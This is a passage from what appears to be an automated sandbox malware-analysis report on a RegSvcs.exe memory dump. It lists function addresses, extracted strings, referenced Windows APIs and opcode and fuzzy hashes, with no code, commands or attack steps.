Instruction Fuzzy Hash: 41D1E4B55083508BD718DF24C8517ABBBE1FFC5318F08896DE4D99B382DB389906CB96

Function 00429739 Relevance: 2.8, Strings: 2, Instructions: 308COMMON

Download Yara Rule

Strings

(. 7, xrefs: 0042977E
,7, xrefs: 00429786

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: (. 7$,7
API String ID: 0-1315767106
Opcode ID: 3dc14f1719d0dcaf1c8e7808f16df868dad44d99b75b9089029e889b2ab59045
Instruction ID: aca24a6d404cff65d8132a2c5354bf9a6b34cab982d47b5a163a498561acaf8d
Opcode Fuzzy Hash: 3dc14f1719d0dcaf1c8e7808f16df868dad44d99b75b9089029e889b2ab59045
Instruction Fuzzy Hash: 73A1DFB190C3519FC714DF25D85262BBBE2EF86314F44892DF4D58B392E738A841CB5A

Function 0041B8F6 Relevance: 1.7, Strings: 1, Instructions: 477COMMON

Download Yara Rule

Strings

EWC`, xrefs: 0041BD43

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: EWC`
API String ID: 0-1922773688
Opcode ID: 96f336dbcf29f94cd9f9a1eaede8d54ada638bb942813ff3d340c66f321929fb
Instruction ID: 3092ec9d695e803f581415aef64df2e1d782c7e4da9fd3e94958caedbaf0e785
Opcode Fuzzy Hash: 96f336dbcf29f94cd9f9a1eaede8d54ada638bb942813ff3d340c66f321929fb
Instruction Fuzzy Hash: 20D11F746047028BC3358F28C4A26A3BBF2EF96304F18542ED5C78BB91E739E846C794

Function 0042D34A Relevance: 1.6, Strings: 1, Instructions: 398COMMON

Download Yara Rule

Strings

><+, xrefs: 0042D353

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: ><+
API String ID: 0-2918635699
Opcode ID: 3980c0afaf6dac2d4ca75895f3ce9cc4aa60152e4397ff49cad2d9ebd5e9afb7
Instruction ID: 444f218a8ad5829191449d1546b31e79214a0b4c0f4cfb8ef7368535fe843fa0
Opcode Fuzzy Hash: 3980c0afaf6dac2d4ca75895f3ce9cc4aa60152e4397ff49cad2d9ebd5e9afb7
Instruction Fuzzy Hash: 72C1E575A047418FD725CF2AD490762FBE2BF9A310F28859EC4DA8B752C739E806CB54

Function 0042B170 Relevance: 1.6, Strings: 1, Instructions: 396COMMON

Download Yara Rule

Strings

", xrefs: 0042B458

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: d05c80c795993c871168dd86f7d1ea5d1d218413b04f758d20a6faf4e3c25647
Instruction ID: f2fd7e02527a425c6081b095c58e6bcd0ab65349b2e1505f4c1e2091d8d38838
Opcode Fuzzy Hash: d05c80c795993c871168dd86f7d1ea5d1d218413b04f758d20a6faf4e3c25647
Instruction Fuzzy Hash: 82C15872B043256BD711CE25E49076BB7D5EF84314F98892FE8958B382E738EC4487DA

Function 00429E80 Relevance: 1.6, APIs: 1, Instructions: 125COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00429F6C

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: bf0f97b787aa3901fc489b07fc1f7d675bb90a5acac53e645be6843c85619458
Instruction ID: 56439e7850811f5116bb8c84f174b1b770b1ea540e4d3f3412480b83843e5581
Opcode Fuzzy Hash: bf0f97b787aa3901fc489b07fc1f7d675bb90a5acac53e645be6843c85619458
Instruction Fuzzy Hash: B141C1B454C341CFD3109F20A98166BBBF4EB86718F10487DE5969B292D735E507CB8B

Function 00416F52 Relevance: 1.6, Strings: 1, Instructions: 331COMMON

Download Yara Rule

Strings

t, xrefs: 004170C9

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: t
API String ID: 0-2238339752
Opcode ID: 039beb9b53b4255e9ee2e6f2bbcbd7cde69c3a8df900983a1a0d2cd4bed9f5c8
Instruction ID: 1cd3e92b5432f2ec1c5279b22e8dfdc45cf82fdb07faf4288aa06f6d08a0fcad
Opcode Fuzzy Hash: 039beb9b53b4255e9ee2e6f2bbcbd7cde69c3a8df900983a1a0d2cd4bed9f5c8
Instruction Fuzzy Hash: 15B187B05093818BD3358F25C9A13EBBBE0EFDA304F04896DD9C94B391EB395546CB86

Function 00427440 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

_^]\, xrefs: 00427465

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: _^]\
API String ID: 2994545307-3116432788
Opcode ID: b4c7d66211ae49d8fd9eccf31c03fcf250aa2d1c5501d05c3c86452f57ff21d1
Instruction ID: 2cadfa6051f0cea8981a5c3a8346752ded914f405fdfafbc00b99242be117cb3
Opcode Fuzzy Hash: b4c7d66211ae49d8fd9eccf31c03fcf250aa2d1c5501d05c3c86452f57ff21d1
Instruction Fuzzy Hash: 1A714B75B0C3205BD7149B29EC9273BB7A1DF86318F58843EE58697382E23CDC45835A

Function 00425F1B Relevance: 1.5, Strings: 1, Instructions: 259COMMON

Download Yara Rule

Strings

_^]\, xrefs: 00425F89

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: _^]\
API String ID: 0-3116432788
Opcode ID: 18627fe42d59fa6849b5f8a45ac1d7137aaf139f75de676eaf8c8d08dd2ee1c0
Instruction ID: 4542599af833d18a30e416191cc565c9845a3175e58f9edfc757ba35f46fda4c
Opcode Fuzzy Hash: 18627fe42d59fa6849b5f8a45ac1d7137aaf139f75de676eaf8c8d08dd2ee1c0
Instruction Fuzzy Hash: 8F714775A0C3508BD324CF68D89166BB7E1EFC5304F59486DE8C597362EB789842CB8A

Function 0043CA40 Relevance: 1.5, Strings: 1, Instructions: 249COMMON

Download Yara Rule

Strings

_^]\, xrefs: 0043CC20

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: _^]\
API String ID: 2994545307-3116432788
Opcode ID: a83dfb6a84884be77bbdeb245f1cea9c60f563621f19ebf7a2bdccf3372ac9f2
Instruction ID: 696eb795723ead0f6ba9be3735fd8be620dffa71c9a4400ef3d7ad22a9e3dc13
Opcode Fuzzy Hash: a83dfb6a84884be77bbdeb245f1cea9c60f563621f19ebf7a2bdccf3372ac9f2
Instruction Fuzzy Hash: C2712871A043014FDB1CDF28CCE162FBB92EB8A710F19A63EE496E7395D6349C418789

Function 0042C0E6 Relevance: 1.5, Strings: 1, Instructions: 228COMMON

Download Yara Rule

Strings

N&, xrefs: 0042C173

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: N&
API String ID: 0-3274356042
Opcode ID: 8fff828ef7096bc6de3c5e3531ef3bcfddfa3f41189f47e61279592947ff70fd
Instruction ID: 81471823a485b6705c349d61d83959a7e20011983708bf5e147628ffe1b1dd5e
Opcode Fuzzy Hash: 8fff828ef7096bc6de3c5e3531ef3bcfddfa3f41189f47e61279592947ff70fd
Instruction Fuzzy Hash: DE51F625604B904BD729CB3A98513B7BBD3ABDB310B58969EC4D7C7786CA3CE4068B14

Function 0042C09E Relevance: 1.5, Strings: 1, Instructions: 217COMMON

Download Yara Rule

Strings

N&, xrefs: 0042C173

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: N&
API String ID: 0-3274356042
Opcode ID: 09941e67317fc8cb3ce7ea217b500117e96f00fb937d19bfefd61d270a526b4e
Instruction ID: e5864593d1339f498270878ef60363620a1941cd2fe9c21c7a7607c55bfa5eb6
Opcode Fuzzy Hash: 09941e67317fc8cb3ce7ea217b500117e96f00fb937d19bfefd61d270a526b4e
Instruction Fuzzy Hash: B2512925604B904AD729CB3A98513B77BD3AF9B310F9C969DC4D7C7B86CA3C94028B15

Function 00441160 Relevance: 1.4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

Strings

@, xrefs: 0044123B

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 1bf28d208f4d471862e62771911b4b91396caa8be407dd285211548932c35c82
Instruction ID: 1aa89e2f6171c8b600b289c24d78a6f9a5b4d57d8403bbd31509dc912f19ad9e
Opcode Fuzzy Hash: 1bf28d208f4d471862e62771911b4b91396caa8be407dd285211548932c35c82
Instruction Fuzzy Hash: 0D4123B19043109BE714CF54CC56B7BBBA1FFD5354F088A2DE5855B3A0E3799844C78A

Function 00441720 Relevance: 1.4, Strings: 1, Instructions: 158COMMON

Download Yara Rule

Strings

=<32, xrefs: 0044176D

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: =<32
API String ID: 2994545307-852023076
Opcode ID: 806326fabb1518b066f083a03506ad00710994454575a613e60301918d7e52c2
Instruction ID: 3b6fc7dbca8d43659897c6c89a338d9db0430b3797e073dd088a6240ba40644d
Opcode Fuzzy Hash: 806326fabb1518b066f083a03506ad00710994454575a613e60301918d7e52c2
Instruction Fuzzy Hash: 7A314438608304ABF714AE159C91B3BB3A6EB85750F18852EE695573F1D738DC90878A

Function 0042C465 Relevance: 1.4, Strings: 1, Instructions: 152COMMON

Download Yara Rule

Strings

AB@|, xrefs: 0042D9F4

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: AB@|
API String ID: 0-3627600888
Opcode ID: f041e5b4f18625dfaa42653504e20addc449c282f38dd463f45fba843b59f9ad
Instruction ID: 9d680adfff61346dbcddf561b221a097d06f6077c5c56bfff523f23a55ee5db6
Opcode Fuzzy Hash: f041e5b4f18625dfaa42653504e20addc449c282f38dd463f45fba843b59f9ad
Instruction Fuzzy Hash: 634106B15046928FD7228F39C850767FBE1BF97310B189699D0D28B796C738E845CB54

Function 0043C830 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

0$z, xrefs: 0043C915

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: 0$z
API String ID: 0-542936926
Opcode ID: 56022ef5e62e296913ac47c6de968db9b320837307f66e6c85d4f38a5b4770bc
Instruction ID: 598e6e7b5ab3f32ace4510c997d5c2914f2054150b2e0cbc2781ed5d43e0899f
Opcode Fuzzy Hash: 56022ef5e62e296913ac47c6de968db9b320837307f66e6c85d4f38a5b4770bc
Instruction Fuzzy Hash: 7A3104B2A193114BD314DF24CC8471BBBD2EB89714F0A992DE484A7342D37A9C428BDA

Function 00428528 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

_^]\, xrefs: 00428545

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: _^]\
API String ID: 0-3116432788
Opcode ID: f6a8d254ef2cb00699e79095288bd1bdad4cbdf7a23a769f2daf49ab799d3e86
Instruction ID: fa1734f8cecfd62dbfa6e1ffd5af071ca539f15cf05182bc01822064141da677
Opcode Fuzzy Hash: f6a8d254ef2cb00699e79095288bd1bdad4cbdf7a23a769f2daf49ab799d3e86
Instruction Fuzzy Hash: 9C21EC7470A2109BD71C8B34DC91B3F73A3FBC6314F69152ED193527A6CB399852468D

Function 00421A10 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

,-, xrefs: 00421A64

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: ,-
API String ID: 0-1027024164
Opcode ID: e841ffa07ed1daa646f5eb3df3353fcb7b3331a6bb754204e02c01eb04e9c511
Instruction ID: 3df528e0a1c1aaf7ae1dd87ce3c0daf4cbce6c1de34562fe1b5624c5cc0b1623
Opcode Fuzzy Hash: e841ffa07ed1daa646f5eb3df3353fcb7b3331a6bb754204e02c01eb04e9c511
Instruction Fuzzy Hash: E8216A61A153108BC7109F29CC52537B7B1EF92364F85861EE4828B361F778CD05C79B

Function 00440340 Relevance: 1.4, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

@, xrefs: 004403AD

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 6ebeeff5786163907a1946c8d73bc8e49d379f446760a2416b3547ff48868a07
Instruction ID: 33784d5b8146ae1d6e83e41184c2528a054757f8bcb0ba64dcdd6e2a9e18c57c
Opcode Fuzzy Hash: 6ebeeff5786163907a1946c8d73bc8e49d379f446760a2416b3547ff48868a07
Instruction Fuzzy Hash: 1831FF756083048BE314DF58D8C266FBBE4EBC5324F14892DEA9883390D739D858CB9A

Function 0042DE07 Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

ses`, xrefs: 0042DE34

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: ses`
API String ID: 0-1601344200
Opcode ID: 7ecea65e69f80fd34ed937d50154ad00ae80800854f723ecc4b508468e07b142
Instruction ID: c16a7131854b6aed293f14fd3f65d90cfdcd1604bceaaf5e70633509fa898857
Opcode Fuzzy Hash: 7ecea65e69f80fd34ed937d50154ad00ae80800854f723ecc4b508468e07b142
Instruction Fuzzy Hash: AD110B645046528BEB168F359C55726BBF1AF33354F1892DCD0D1DF292D624C442CB28

Function 0042DDFF Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

ses`, xrefs: 0042DE34

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: ses`
API String ID: 0-1601344200
Opcode ID: acdcb12a599db5bd8b29fdd08185f7d8639ff27a1d18159ef2967bd0d873cb9e
Instruction ID: 2b194369684db8568e4cc4b10858fb41ea2ffb87a76b3f2bea81f07ece6f04e6
Opcode Fuzzy Hash: acdcb12a599db5bd8b29fdd08185f7d8639ff27a1d18159ef2967bd0d873cb9e
Instruction Fuzzy Hash: 21014EA46446538BE7128F359C15726FBF1EF33350F18E2A8D091DF2A2D634C842CB18

Function 004289E9 Relevance: 1.3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

Strings

_^]\, xrefs: 00428A15

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: _^]\
API String ID: 0-3116432788
Opcode ID: 7248b21c1a5d66122527e099d388fada2b713c8df9422b832066424d84c6be5f
Instruction ID: a8dfba8dee4ad149da4611bc05b701b5a33fd88c903e8634cd43ba9cb2d750ed
Opcode Fuzzy Hash: 7248b21c1a5d66122527e099d388fada2b713c8df9422b832066424d84c6be5f
Instruction Fuzzy Hash: ED01D6B0B0A32187D708CB15D49162FB7E2BBCA310F195A2ED0D623755C738E84287CE

Function 0043FA20 Relevance: .7, Instructions: 685COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c171becab70a86a6e575e69f5b8f9388b08847a9ebf173f34fd08f30fb17e69
Instruction ID: 15bf1ea58ee97730c61fd6eda894784fa47516086410607d7a072294ae37ca60
Opcode Fuzzy Hash: 6c171becab70a86a6e575e69f5b8f9388b08847a9ebf173f34fd08f30fb17e69
Instruction Fuzzy Hash: DB22243AB54211CFDB08CF78D8A12AAB3E2FF8A314F1A857DC94697351D7389851CB85

Function 00402EB0 Relevance: .7, Instructions: 664COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9edad3ee9539bfad45d948b53ca40223dce90882209d286bf0c99f9c6cd7d631
Instruction ID: 4eb073694aac07531e4e37dd991e5aaa8cdb99ba0f72cd08d303837d400a2551
Opcode Fuzzy Hash: 9edad3ee9539bfad45d948b53ca40223dce90882209d286bf0c99f9c6cd7d631
Instruction Fuzzy Hash: 3552F5715083458FCB15CF24C0906AABFE1BF89305F188A7EF8996B381D779D949CB89

Function 0043FB10 Relevance: .5, Instructions: 537COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b217010d00d36b6e532b914cc2c8748e4c1d1399e6fa795548d92cd5122fdeb
Instruction ID: bc1c9a79bd48fbe04f38ca9b4e00e2ed040d16652403f2f97064ad5dbaff0f70
Opcode Fuzzy Hash: 5b217010d00d36b6e532b914cc2c8748e4c1d1399e6fa795548d92cd5122fdeb
Instruction Fuzzy Hash: 9502483AB54211CFD708CF78D8E02AAB7A2FF8A314F1A857DC94693351D739A851CB85

Function 0043FB2A Relevance: .5, Instructions: 527COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c87e449dc06f3ba1431d52dba96a7b849506db30f3e9f92c5d405e1d6b40a5de
Instruction ID: a1c715d08816259ade05fabf2ed31b4fea3a659fa95dcf98a80d69cb0f26fb97
Opcode Fuzzy Hash: c87e449dc06f3ba1431d52dba96a7b849506db30f3e9f92c5d405e1d6b40a5de
Instruction Fuzzy Hash: 59F13939B54211CFD708CF78D8E02AAB3A2FF8A314F1A857DC94693351D735A851CB85

Function 0043FB28 Relevance: .5, Instructions: 526COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a977913465e41e9bc8fdf4fe2f93bdf54fd14983a5a5a95a9e13933d6850651
Instruction ID: 7c816634e29e8635841472aa4442699fe105e1924a6df37b46faa06d9bb3fd90
Opcode Fuzzy Hash: 3a977913465e41e9bc8fdf4fe2f93bdf54fd14983a5a5a95a9e13933d6850651
Instruction Fuzzy Hash: 87F13939B54211CFDB08CF78D8E02AAB3A2FF8A314F19857DC94693351D739A851CB85

Function 0041D8AC Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80d8542304fd61a6ec4704e93bd93ae71f34bee62e8590f6df1c4416f41d4fae
Instruction ID: 5e9d7e84427f8d5228b95ea90cb98d597139ae8c2cd507701152bf7f0d2aec8f
Opcode Fuzzy Hash: 80d8542304fd61a6ec4704e93bd93ae71f34bee62e8590f6df1c4416f41d4fae
Instruction Fuzzy Hash: DBE117B1E00215CFCB14CF69C8516BBBBB1FF4A310F18465DE496AB391E338A951CB99

Function 0041D8D8 Relevance: .5, Instructions: 499COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e75f06d64608b7b62d8af53fcc16e7372a13ff163848b6366e20841680721154
Instruction ID: 0a10cce7f6b7f4c9e5a99d8e2b4a5133f7361f2e21e3c94240870ffe1abc1756
Opcode Fuzzy Hash: e75f06d64608b7b62d8af53fcc16e7372a13ff163848b6366e20841680721154
Instruction Fuzzy Hash: FAE105B1E00615CFCB14CF69C8516BBBBB1FF4A310F18465DE496AB391E338A951CB98

Function 0043FD70 Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6587f211f8bb243ac471bf4d418ae114b6383508c51c90636e998149a2c9f481
Instruction ID: 0795aabbeeca3c289a54d5a983081f6cc9b815f424e4503ad834db78cbe5b8b0
Opcode Fuzzy Hash: 6587f211f8bb243ac471bf4d418ae114b6383508c51c90636e998149a2c9f481
Instruction Fuzzy Hash: 46B1FF39B04211CFCB08CF78E8902AAB7B2FF8A324F1985BDD94593351C775A861CB85

Function 0043FE00 Relevance: .3, Instructions: 339COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f54337c51817de601ce1ec662ea4a86470746f121211f08e90cfc523ef7306dd
Instruction ID: 8f12c1f11cf7dd9d5989c678c09bce864ea8bb7899150d07336210a81ccf9f3f
Opcode Fuzzy Hash: f54337c51817de601ce1ec662ea4a86470746f121211f08e90cfc523ef7306dd
Instruction Fuzzy Hash: 2AB11E39A04205CFDB08CF78D8902AEB7B2FF8A314F19857DD94593391D735A922CB85

Function 004406F0 Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e85f12f7bbac3723ecb9eee596fb1eeda3fecaf8cb6cd1164115649647f81f7d
Instruction ID: bbaad09b7466ea8e443d8553dc44a5451933c837b4ca1b8c359bd5f9b3e4a5a9
Opcode Fuzzy Hash: e85f12f7bbac3723ecb9eee596fb1eeda3fecaf8cb6cd1164115649647f81f7d
Instruction Fuzzy Hash: 478115756083018BE714DF19C890A2BB7A2FFD5710F19852DEAC49B395EB38DC61CB86

Function 0042BF13 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d79f1fd880ab180e1b863fa2a9d981922e66a5893552c9cd54a43db72e04df75
Instruction ID: 1ae5c22645a0c49bea9d6a70653e44e8157fd1e252da5b34c0afae31fd87a2fe
Opcode Fuzzy Hash: d79f1fd880ab180e1b863fa2a9d981922e66a5893552c9cd54a43db72e04df75
Instruction Fuzzy Hash: 314129A4204790CBE7328B3A98E0B737FE0EF27305F48198DE4E78B646D3299405CB59

Function 0041B57D Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7e0094a64ed9e0f308886f35ab180eb3d940b80439b08ae9969d5e3e11de77b
Instruction ID: d8b4a6cdd0763d1df8515212ee66b27a55189a0bec8caba65ff171ec82452c36
Opcode Fuzzy Hash: c7e0094a64ed9e0f308886f35ab180eb3d940b80439b08ae9969d5e3e11de77b
Instruction Fuzzy Hash: D23138745047904BD7368B3584A17737FE09F2B308F58489ED1D387293D22A9549C796

Function 0040CC7A Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: EnvironmentExpandStrings$Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID:
API String ID: 1780199113-0
Opcode ID: 94b07ba9958116a24f49aa2ce181052b6958ac39138e9011af663e1bf14a50e6
Instruction ID: 6b5d6437c4fa7b8805f8ed77d50acdad1f0dd5a7239fa4c95c8d74861a36b3c0
Opcode Fuzzy Hash: 94b07ba9958116a24f49aa2ce181052b6958ac39138e9011af663e1bf14a50e6
Instruction Fuzzy Hash: 0531E4EAF405405BE5057A232863A6F21674BD071CF48103EF84A272C3ED7DB916959F

Function 00432070 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33cc46eaab1da60d5c7c303c1f4bff1ac88459165d933fbad2b388fb389fe25a
Instruction ID: 1166d7d1cf2a9c2f689b228294c5ddb55241fb8fb130d34f92ce9a1e81a5b4f1
Opcode Fuzzy Hash: 33cc46eaab1da60d5c7c303c1f4bff1ac88459165d933fbad2b388fb389fe25a
Instruction Fuzzy Hash: 0D814CB451A7808FE374DF05D59869FBBE0FB8A308F11891ED4984B350CBB86549CF9A

Function 00436210 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

